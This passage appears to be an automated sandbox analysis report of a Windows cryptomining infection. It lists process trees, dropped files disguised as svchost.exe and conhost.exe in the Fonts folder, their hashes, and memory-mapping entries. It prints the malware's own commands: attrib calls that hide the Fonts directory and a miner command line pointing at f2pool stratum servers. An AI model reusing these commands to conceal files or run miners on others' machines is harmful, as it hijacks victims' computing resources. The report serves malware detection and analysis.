C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
\??\c:\windows\Fonts\rundlls.exe"rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tem.vbsFilesize
215B
MD5535a478cc80a0fbbf990eed73f8788bb
SHA1459479dadaf00f3fa0de78f640c34dd426fd61aa
SHA256323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51
SHA5123c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1
-
C:\Windows\Fonts\conhost.exeFilesize
2.9MB
MD51b9583c6c3eab1da961aec9e42bfbcb8
SHA1c60f85fa6bcc463b3d38b7714916b241f2139650
SHA2566260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA5120bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
C:\Windows\Fonts\rundlls.exeFilesize
5.2MB
MD5ed499b3a95e11ecf57e5131cd82c2a14
SHA17f37e85068457497f5f34e73edde4963694cfc19
SHA256c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\TEMP\csonhost.batFilesize
6KB
MD59da29265b1391c18f00c959c64b3fb65
SHA1dee2f9ded1706933f452ebcd2d5ccd8818af713e
SHA256fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824
SHA5126d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\windows\Fonts\conhost.exeFilesize
2.9MB
MD51b9583c6c3eab1da961aec9e42bfbcb8
SHA1c60f85fa6bcc463b3d38b7714916b241f2139650
SHA2566260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA5120bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
\??\c:\windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\rundlls.exeFilesize
5.2MB
MD5ed499b3a95e11ecf57e5131cd82c2a14
SHA17f37e85068457497f5f34e73edde4963694cfc19
SHA256c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
memory/108-75-0x0000000000000000-mapping.dmp
-
memory/268-123-0x0000000000000000-mapping.dmp
-
memory/296-137-0x0000000000000000-mapping.dmp
-
memory/364-88-0x0000000000000000-mapping.dmp
-
memory/544-110-0x0000000000000000-mapping.dmp
-
memory/544-142-0x0000000000000000-mapping.dmp
-
memory/596-112-0x0000000000000000-mapping.dmp
-
memory/704-86-0x0000000000000000-mapping.dmp
-
memory/784-115-0x0000000000000000-mapping.dmp
-
memory/784-144-0x0000000000000000-mapping.dmp
-
memory/788-62-0x0000000000000000-mapping.dmp
-
memory/836-71-0x0000000000000000-mapping.dmp
-
memory/844-117-0x0000000000000000-mapping.dmp
-
memory/876-63-0x0000000000000000-mapping.dmp
-
memory/904-120-0x0000000000000000-mapping.dmp
-
memory/916-54-0x00000000753B1000-0x00000000753B3000-memory.dmpFilesize
8KB
-
memory/948-116-0x0000000000000000-mapping.dmp
-
memory/956-76-0x0000000000000000-mapping.dmp
-
memory/972-97-0x0000000000000000-mapping.dmp
-
memory/976-68-0x0000000000000000-mapping.dmp
-
memory/1040-84-0x0000000000000000-mapping.dmp
-
memory/1096-121-0x0000000000000000-mapping.dmp
-
memory/1168-125-0x0000000000000000-mapping.dmp
-
memory/1204-64-0x0000000000000000-mapping.dmp
-
memory/1228-59-0x0000000000000000-mapping.dmp
-
memory/1236-99-0x0000000000000000-mapping.dmp
-
memory/1332-65-0x0000000000000000-mapping.dmp
-
memory/1352-66-0x0000000000000000-mapping.dmp
-
memory/1356-92-0x0000000000000000-mapping.dmp
-
memory/1416-73-0x0000000000000000-mapping.dmp
-
memory/1472-109-0x0000000000000000-mapping.dmp
-
memory/1560-118-0x0000000000000000-mapping.dmp
-
memory/1560-70-0x0000000000000000-mapping.dmp
-
memory/1568-114-0x0000000000000000-mapping.dmp
-
memory/1584-113-0x0000000000000000-mapping.dmp
-
memory/1616-56-0x0000000000000000-mapping.dmp
-
memory/1660-89-0x0000000000000000-mapping.dmp
-
memory/1668-102-0x0000000000000000-mapping.dmp
-
memory/1680-57-0x0000000000000000-mapping.dmp
-
memory/1720-55-0x0000000000000000-mapping.dmp
-
memory/1732-74-0x0000000000000000-mapping.dmp
-
memory/1768-91-0x0000000000000000-mapping.dmp
-
memory/1872-107-0x0000000000000000-mapping.dmp
-
memory/1888-69-0x0000000000000000-mapping.dmp
-
memory/1912-127-0x0000000000000000-mapping.dmp
-
memory/1916-106-0x0000000000000000-mapping.dmp
-
memory/1916-87-0x0000000000000000-mapping.dmp
-
memory/1924-72-0x0000000000000000-mapping.dmp
-
memory/1936-67-0x0000000000000000-mapping.dmp
-
memory/1952-140-0x0000000000000000-mapping.dmp
-
memory/1952-143-0x0000000000100000-0x0000000000120000-memory.dmpFilesize
128KB
-
memory/1956-119-0x0000000000000000-mapping.dmp
-
memory/1964-61-0x0000000000000000-mapping.dmp
-
memory/1976-82-0x0000000000000000-mapping.dmp
-
memory/2000-111-0x0000000000000000-mapping.dmp
-
memory/2000-96-0x0000000000000000-mapping.dmp
-
memory/2000-122-0x0000000000000000-mapping.dmp
-
memory/2008-60-0x0000000000000000-mapping.dmp
-
memory/2016-129-0x0000000000000000-mapping.dmp
-
memory/2016-80-0x0000000000000000-mapping.dmp
-
memory/2028-134-0x0000000000000000-mapping.dmp
-
memory/2032-78-0x0000000000000000-mapping.dmp
-
memory/2032-58-0x0000000000000000-mapping.dmp
-
memory/2036-108-0x0000000000000000-mapping.dmp
-
memory/2036-77-0x0000000000000000-mapping.dmp
-
memory/2044-105-0x0000000000000000-mapping.dmp